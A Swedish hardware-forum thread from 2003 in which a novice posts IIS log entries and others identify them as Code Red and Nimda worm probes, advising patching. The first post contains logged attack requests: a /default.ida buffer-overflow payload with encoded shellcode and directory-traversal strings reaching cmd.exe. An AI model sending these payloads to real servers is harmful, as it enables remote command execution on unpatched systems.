IIS och loggar|Nätverk / Internet|Forum|Nordichardware

sp_LogInOut Log In
sp_Search Search
Advanced Search
Search
Forum Scope


Match



Forum Options



Minimum search word length is 3 characters - maximum search word length is 84 characters
sp_Search Search
Lost password?
The forums are currently locked and only available for read only access
sp_Feed sp_TopicIcon
IIS och loggar
Cyrgo
Mina inlägg skrivs i binär kod
Medlem
Forum Posts: 112
Member Since:
January 3, 2003
sp_UserOfflineSmall Offline
1
May 8, 2003 - 4:04 pm
sp_Permalink sp_Print

217.208.52.72, -, 2003-05-10, 15:05:40, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.52.72, -, 2003-05-10, 15:29:12, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 72, 4201, 404, 3, GET, /scripts/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 20, 70, 4201, 404, 2, GET, /MSADC/root.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 80, 4201, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 117, 4201, 404, 3, GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 145, 0, 500, 87, GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 97, 4201, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 10, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
217.208.131.244, -, 2003-05-10, 16:08:30, W3SVC1, LAPPEN, 192.168.0.37, 0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
217.208.52.72, -, 2003-05-10, 16:09:28, W3SVC1, LAPPEN, 192.168.0.37, 50, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,
217.44.144.174, -, 2003-05-10, 16:23:26, W3SVC1, LAPPEN, 192.168.0.37, 90, 3818, 4201, 404, 2, GET, /default.ida, XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a,

Vad betyder allt det där? nån som strular med min webbserver är det fullt normalt? Är lite nybörjare på IIS så det vore tacksamt med vad detta betyder.

/Cyrgo

oxiswoofer
Member
Medlem
Forum Posts: 2101
Member Since:
April 1, 2003
sp_UserOfflineSmall Offline
331597
May 8, 2003 - 5:05 pm
sp_Permalink sp_Print

hm..det är fullt normalt! jag har åsså så på min
det är sk nätscannare eller nått...dom försöker hitta till windows mappen o förstöra... :cy:

Cyrgo
Mina inlägg skrivs i binär kod
Medlem
Forum Posts: 112
Member Since:
January 3, 2003
sp_UserOfflineSmall Offline
331601
May 8, 2003 - 5:12 pm
sp_Permalink sp_Print

Ahum, tack för svaret. 🙂 Dom kör väll nåt exploit script elle nåt skit.

69link
Kommer du hit ofta?
Medlem
Forum Posts: 1398
Member Since:
July 2, 2001
sp_UserOfflineSmall Offline
332137
May 9, 2003 - 11:04 am
sp_Permalink sp_Print

Det där är Nimda, CodeRed eller liknande. Dom letar upp opatchade windowsdatorer och försöker utnyttja kända hål i IIS-servern. Hittar dom en sådan dator så kopierar dom in sig och letar i sin tur efter nya datorer osv.

Kör man en windowsdator med opatchad IIS så betyder det att vem som helst kan köra valfritt program på din dator, även logga på din dator och göra allt!

=JoNaZ=
Kommer du hit ofta?
Medlem
Forum Posts: 1010
Member Since:
July 3, 2001
sp_UserOfflineSmall Offline
332230
May 9, 2003 - 12:59 pm
sp_Permalink sp_Print

jag skulle aldrig våga köra med IIS! håller mig till apache med php o mysql

Biblo
Kommer du hit ofta?
Medlem
Forum Posts: 975
Member Since:
August 24, 2002
sp_UserOfflineSmall Offline
332313
May 9, 2003 - 2:43 pm
sp_Permalink sp_Print

hehe... har lite minnen av sånt där 😕

Patcha den med senaste sp3 lr 4 kanske finns nu, kör sygate presonal firewall lr liknande så är det lungt...

men som sagt, utan patch är det öppet för alla :bok:

sp_Feed
Go to top
Forum Timezone: Europe/Stockholm
Most Users Ever Online: 694
Currently Online:
Guest(s) 34
Currently Browsing this Page:
1 Guest(s)
Top Posters:
Andreas Galistel: 16287
Jonas Klar: 15897
ilg@dd: 10810
Nyhet: 10607
Mind: 10550
Ctrl: 10355
Gueno: 9881
Guest: 9344
Snorch: 8881
Callister: 8468
Newest Members:
PetrbonFU PetrbonFU
Karine Bembry
Dolores Mcdaniels
Anibal McLeish
Francisca Alt
Alfie Everhart
Lester Huitt
Orlando Jorgensen
Mikki Lundgren
Dakota Kozlowski
Forum Stats:
Groups: 11
Forums: 59
Topics: 146630
Posts: 1300967

 

Member Stats:
Guest Posters: 2
Members: 79425
Moderators: 0
Admins: 11
Administrators: nordicadmin, Henrik Berntsson, Anton Karmehed, Carl Holmberg, Joel Oscarsson, Mikael Linnér, Mikael Schwartz, Andreas Paulsson, Nickebjrk, Mattias Pettersson, EmxL